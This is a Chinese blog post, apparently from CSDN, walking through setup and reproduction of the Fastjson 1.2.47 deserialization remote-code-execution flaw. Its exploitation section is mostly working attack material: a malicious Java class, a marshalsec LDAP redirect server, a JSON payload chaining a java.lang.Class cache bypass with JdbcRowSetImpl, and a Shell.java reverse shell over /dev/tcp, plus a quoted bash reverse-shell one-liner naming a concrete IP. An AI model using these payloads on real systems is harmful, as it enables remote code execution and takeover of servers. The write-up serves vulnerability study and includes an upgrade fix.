(环境搭建+复现)Fastjson1.2.47版本反序列化漏洞复现

最新推荐文章于 2024-05-30 14:49:13 发布
最新推荐文章于 2024-05-30 14:49:13 发布
阅读量1.7w 收藏 23
点赞数 7
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/103049474
版权

0x00 简介

fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean

0x01 漏洞概述

Fastjson1.2.47反序列化漏洞

首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。

0x02 影响版本

Fastjson1.2.47以及之前的版本

0x03 环境搭建

所需资源取自我Sven师傅:

unbutu&kali安装jdk:jdk8u181

链接: https://pan.baidu.com/s/1nI-JT93vjcA9--7fb0fhqw&shfl=shareset 提取码: sven

tomcat下载:

链接:https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.27/bin/apache-tomcat-9.0.27.tar.gz

Fastjson1.2.47:

链接: https://pan.baidu.com/s/1C022L851nIkq4zy5hiG_TA&shfl=shareset 提取码: sven

工具:marshalsec,需要用mvn打包一下,

github:https://github.com/mbechler/marshalsec

链接(已打包好): https://pan.baidu.com/s/1kT9vwhNDDdiJ3dL9BS3U4w&shfl=shareset 提取码: sven

方法一:使用docker搭建tomcat

1、安装Docker

yum install docker             

2、拉取官方镜像

docker pull tomcat

3、映射到我服务器8080端口

docker run --name tomcat -p 8080:8080 -d tomcat

4、访问

http://ip:8080/

5、将fastjson环境安装在tomcat上

这里我直接复制到tomcat的webapps目录下

docker cp fastjson1.2.47  tomcat:/usr/local/tomcat/webapps/

①将jdk1.8.0_181复制到tomcat的/usr/java目录下

②解压tar -xzvf

可使用docker exec -i -t tomcat /bin/bash命令查看docker中tomcat的目录

③访问http://ip:8080/fastjson1.2.47/

目标是一个web应用,访问返回“Hello world”。正常POST一个json,目标会提取json对象中的name和age拼接成一句话返回:

至此docker的fastjson反序列化漏洞环境搭建成功。

方法二:本地搭建tomcat

1、下载一个tomcat9

https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.27/bin/apache-tomcat-9.0.27.tar.gz

2、将此压缩包复制到我的linux服务器上

解压

tar -zxvf apache-tomcat-9.0.27.tar.gz -C /

mv /apache-tomcat-9.0.27 /tomcat9

3、授予tomcat9这个文件夹777权限

chmod -R 777 /tomcat9

4、配置JDK版本及环境变量

export JAVA_HOME=/usr/java/jdk1.8.0_181

export JRE_HOME=/usr/java/jdk1.8.0_181/jre

export CLASS_PATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib

export PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin

export CATALINA_HOME=/tomcat9

5、启动tomcat

进入tomcat9下的bin目录

./catalina.sh start

最后复制fastjson1.2.47到webapps文件夹下,环境即搭建成功。

0x04 漏洞利用

此时/tmp目录

 

1、编译Exploit.java

javac Exploit.java

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec("touch /tmp/qiqi);
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

2、使用python搭建一个临时的web服务

[root@qiqi wordpress]# python -m SimpleHTTPServer  1111

Serving HTTP on 0.0.0.0 port 1111 ...

Ps:此步是为了接收LDAP服务重定向请求,需要在payload的目录下开启此web服务,这样才可以访问到payload文件

3、服务器使用marshalsec开启LDAP服务监听:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:1111/#Exploit 9999

Ps:使用marshalsec工具快捷的开启LDAP

服务。借助LDAP服务将LDAP reference result 重定向到web服务器。

LDAP动态类加载,如果当前JVM中没有某个类的定义,它可以从远程URL去下载这个类的class,动态加载的对象class文件可以使用Web服务的方式进行托管。

4、Exploit.class恶意类执行的命令是:

在tmp目录下创建名为qiqi的文件。

5、Burp发包

使用EXP:

{

    "name":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "x":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"ldap://ip:9999/Exploit",

        "autoCommit":true

    }



}

6、此时/tmp目录

7、GETSHELL

同上步骤,不过是用Shell.java文件生成恶意类反弹shell

import java.io.BufferedReader;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Shell{
    public Shell() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

0x05 修复方式

将Fastjson升级到最新版本

https://github.com/alibaba/fastjson

0x06坑点

1、Docker pull下来的tomcat默认jdk版本是1.8.0_232,需要更改一下docker的jdk版本。(坑了我半天,docker外jdk是1.8.0_181,但是docker中tomcat的启动环境是1.8.0_232)

Docker中,在root用户下将JDK环境变量配置到了/etc/profile中,当时通过source /etc/profile命令使该文件生效,echo $JAVA_HOME时也没有问题,但是重启容器以后就又不生效了。

解决:在/root/.bashrc文件中添加一句source /etc/profile(或者将环境变量的配置放到该文件中)

2、在使用LADP服务反弹shell用的命令不能直接使用

"bash -i >& /dev/tcp/47.101.72.112/10001 0>&1"

3、jdk版本一定要注意!

启动服务之前用 java -version查看自己的jdk版本是否低于以下jdk版本。

参考文章:

http://www.svenbeast.com/post/c0VE5mjC-/#0x03-%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA

https://blog.csdn.net/lwcaiCSDN/article/details/87862025

https://www.cnblogs.com/moonsoft/p/9264883.html

https://www.cnblogs.com/Welk1n/p/11446519.html

daxi0ng
关注
  • 7
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 17
    评论
专栏目录
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3367
Fastjson 1.2.47反序列化漏洞复现
fastjson 1.2.47 远程命令执行漏洞
weixin_42786460的博客
10-14 514
fastjson 1.2.47 远程命令执行漏洞
java代码审计之fastjson反序列化漏洞
最新发布
CheatMyself的博客
05-30 940
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。该产品主要提供了两个接口,JSON.toJSONString和JSON.parseObject/JSON.parse分别实现序列化和反序列化
Fastjson【RCE1.2.47漏洞复现
02-24 1272
Fastjson漏洞原理和RCE1.2.47漏洞复现
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
HEAVEN569的博客
06-21 1613
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2424
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
vulhub复现fastjson1.2.47漏洞复现
m0_70483044的博客
07-14 2882
目录什么是json?fastjson有啥用?什么是fastjson?json语法规则为什么要引进AutoType?漏洞原理怎么确认存在漏洞的?漏洞复现反弹shell。
fastjson1.2.47漏洞复现
m0_63699746的博客
07-05 724
​在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。
【网络安全】Fastjson反序列化漏洞复现
kali_Ma的博客
12-26 2673
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
fastjson1.2.47RCE远程命令执行漏洞复现
zyl404的博客
01-06 1807
fastjson1.2.47RCE远程命令执行漏洞分析 漏洞背景 在2019年6月,fastjson 被爆出在 fastjson< =1.2.47版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令。 漏洞分析 此漏洞利用的核心点是java.lang.class这个java的基础类,在fastjson 1.2.48以前的版本没有做该类做任何限制,加上代码的一些逻辑缺陷,造成黑名单以及autotype的绕过。 过程: 1.Fastjson在开始解析json (JS 对象
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
这个漏洞主要源自Fastjson的`parseObject`和`parseArray`等方法,当解析包含特殊JSON格式的对象或数组时,Fastjson未能进行有效的安全校验,导致了反序列化过程中的代码执行。攻击者可以通过构造恶意的JSON字符串,...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列化和反序列化,以实现与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的JSON处理库,它提供了快速的序列化和反序列化能力,支持多种Java类型,包括...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
Fastjson版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson<=1.2.47反序列化漏洞为例 1、此时/tmp目录 ![img]...
环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞
热门推荐
daxi0ng的博客
12-10 1万+
0x00 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 0x01 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 0x02 影响范围 Apache Log4j 2.x <= 2.15.0-rc1 0x02环境搭建 1、创建一个新的maven项目,并导入Log4j的依赖包 <depe...
环境搭建+复现)CVE-2019-17571 Apache Log4j SocketServer 反序列化漏洞
daxi0ng的博客
04-03 9031
1、【CVE编号】 CVE-2019-17571 2、【漏洞名称】 Apache Log4j SocketServer 反序列化漏洞 3、【靶标分类】 通用漏洞组件类靶标 4、【影响版本】 Log4j1.2.x<=1.2.17 5、【漏洞分类】 代码执行 6、【漏洞等级】 高 7、【漏洞简介】 Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个...
记录一次shiro反序列化getshell
daxi0ng的博客
08-02 6981
一个站 http://wxbase.xxxxx.com/error/unauth 一个包,发现有shiro反序列化漏洞 使用ysoserial URLDNS模块探测 java -jar ysoserial.jar URLDNS "http://`whoami`.xxxx.ceye.io">payload.dat python2 shiro-encode.py # -*...
fastjson-1.2.47反序列化
07-27
Fastjson-1.2.47存在反序列化远程命令执行漏洞。在该版本之前的Fastjson版本中,攻击者可以利用特殊构造的json字符串绕过反序列化白名单检测,成功执行任意命令。\[1\]\[2\]然而,在1.2.25版本后,阿里巴巴为了防御Fastjson反序列化漏洞,设置了autoTypeSupport属性默认为false,并增加了checkAutoType()函数,通过黑白名单的方式来进行防御。因此,后续发现的Fastjson反序列化漏洞都是针对黑名单绕过来实现攻击利用的目的。\[3\] #### 引用[.reference_title] - *1* [Fastjson1.2.47反序列化漏洞](https://blog.csdn.net/weixin_51151498/article/details/128548751)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [fastjson漏洞 - Fastjson1.2.47反序列化漏洞](https://blog.csdn.net/weixin_44971640/article/details/128582582)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 17
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值